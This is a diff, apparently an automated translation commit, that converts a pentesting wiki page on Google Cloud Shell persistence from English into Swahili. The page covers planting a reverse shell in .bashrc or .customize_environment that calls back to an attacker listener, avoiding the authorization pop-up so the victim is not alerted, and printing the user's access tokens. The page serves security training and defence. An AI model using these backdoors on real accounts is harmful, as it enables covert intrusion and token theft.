Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md

@@ -4,7 +4,7 @@
 
 ## Cloud Shell
 
-For more information check:
+Kwa maelezo zaidi angalia:
 
 {{#ref}}
 ../gcp-services/gcp-cloud-shell-enum.md
@@ -12,62 +12,52 @@ For more information check:
 
 ### Persistent Backdoor
 
-[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
+[**Google Cloud Shell**](https://cloud.google.com/shell/) inakupa ufikiaji wa amri kwa rasilimali zako za wingu moja kwa moja kutoka kwa kivinjari chako bila gharama yoyote inayohusiana.
 
-You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
+Unaweza kufikia Cloud Shell ya Google kutoka **web console** au kwa kukimbia **`gcloud cloud-shell ssh`**.
 
-This console has some interesting capabilities for attackers:
+Konsoli hii ina uwezo wa kuvutia kwa washambuliaji:
 
-1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
-2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
-3. There is **no capabilities for an organisation to monitor** the activity of that instance.
-
-This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
+1. **Mtumiaji yeyote wa Google mwenye ufikiaji wa Google Cloud** ana ufikiaji wa mfano wa Cloud Shell ulio na uthibitisho kamili (Akaunti za Huduma zinaweza, hata ikiwa ni Wamiliki wa shirika).
+2. Mfano huo uta **hifadhi saraka yake ya nyumbani kwa angalau siku 120** ikiwa hakuna shughuli inayoendelea.
+3. Hakuna **uwezo wa shirika kufuatilia** shughuli za mfano huo.
 
+Hii kwa msingi inamaanisha kwamba mshambuliaji anaweza kuweka backdoor katika saraka ya nyumbani ya mtumiaji na kadri mtumiaji anavyounganisha na GC Shell kila siku 120 angalau, backdoor itadumu na mshambuliaji atapata shell kila wakati inapoendeshwa kwa kufanya:
 ```bash
 echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
 ```
-
-There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
-
+Kuna faili nyingine katika folda ya nyumbani inayoitwa **`.customize_environment`** ambayo, ikiwa ipo, itakuwa **inasanidi kila wakati** mtumiaji anapofikia **cloud shell** (kama katika mbinu ya awali). Ingiza backdoor ya awali au moja kama ifuatayo ili kudumisha uvumilivu kadri mtumiaji anavyotumia "mara kwa mara" cloud shell:
 ```bash
 #!/bin/sh
 apt-get install netcat -y
 nc <LISTENER-ADDR> 443 -e /bin/bash
 ```
-
 > [!WARNING]
-> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
+> Ni muhimu kutambua kwamba **wakati wa kwanza kitendo kinachohitaji uthibitisho kinapofanywa**, dirisha la ruhusa linaonekana kwenye kivinjari cha mtumiaji. Dirisha hili lazima likubaliwe kabla ya amri kuweza kutekelezwa. Ikiwa dirisha lisilotarajiwa linaonekana, linaweza kuleta wasiwasi na huenda likaharibu njia ya kudumu inayotumika.
 
-This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
+Hii ni dirisha la pop-up kutoka kwa kutekeleza `gcloud projects list` kutoka kwa cloud shell (kama mshambuliaji) lililotazamwa katika kikao cha kivinjari cha mtumiaji:
 
 <figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
 
-However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
-
+Hata hivyo, ikiwa mtumiaji amekuwa akitumia cloudshell kwa shughuli, dirisha la pop-up halitaonekana na unaweza **kusanya tokens za mtumiaji kwa**:
 ```bash
 gcloud auth print-access-token
 gcloud auth application-default print-access-token
 ```
+#### Jinsi muunganisho wa SSH unavyoanzishwa
 
-#### How the SSH connection is stablished
+Kimsingi, hizi API calls 3 zinatumika:
 
-Basically, these 3 API calls are used:
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (itakufanya uongeze funguo yako ya umma uliyounda kwa ndani)
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (itakufanya uanzishe mfano)
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (itakueleza ip ya google cloud shell)
 
-- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
-- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
-- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
+Lakini unaweza kupata taarifa zaidi katika [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
 
-But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
-
-## References
+## Marejeo
 
 - [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
 - [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
 - [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-